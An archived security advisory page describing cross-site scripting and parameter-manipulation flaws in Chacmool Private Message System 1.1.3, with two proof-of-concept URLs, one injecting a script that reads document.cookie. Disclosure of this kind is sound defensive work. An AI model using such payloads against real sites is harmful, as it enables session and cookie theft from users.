about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Chacmool Private Message System Multiple Vulnerabilities


Title Chacmool Private Message System Multiple Vulnerabilities
Published 2004-11-12-12:00AM
Updated 2004-11-13-05:30PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to digital ex <dx_netsec@yahoo.com>.
Vulnerable  chacmool Private Message System 1.1.3
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/message_send.php?tid=%22><script>alert(document.cookie)</script>
http://www.example.com/message_send.php?quote=[ID]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 04:35:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo cookie dec Horcesex news for c 200 /compo 200 /compo Lotus Note www.sexy m www.iran t 200 /compo sex+saniya news for c 200 /compo indian sex 200 /compo Freeadults 200 /compo OpenSSH 4 indian+sex CMS is Fre 200 /compo SEXYMOVE www.19on.c /search/ex mallika sh 200 /compo wwwtamilse news for c mambo Remo apache 2.2 NetrsendMe 200 /compo news for c Fotobugils phpbb port resin 200 /compo Invision P bigcockonl free cd ke mambo Remo shakira nu news for C 200 /compo mambo Remo www.anytxt linux elf easyjet php-nuke 2 wwwtamilse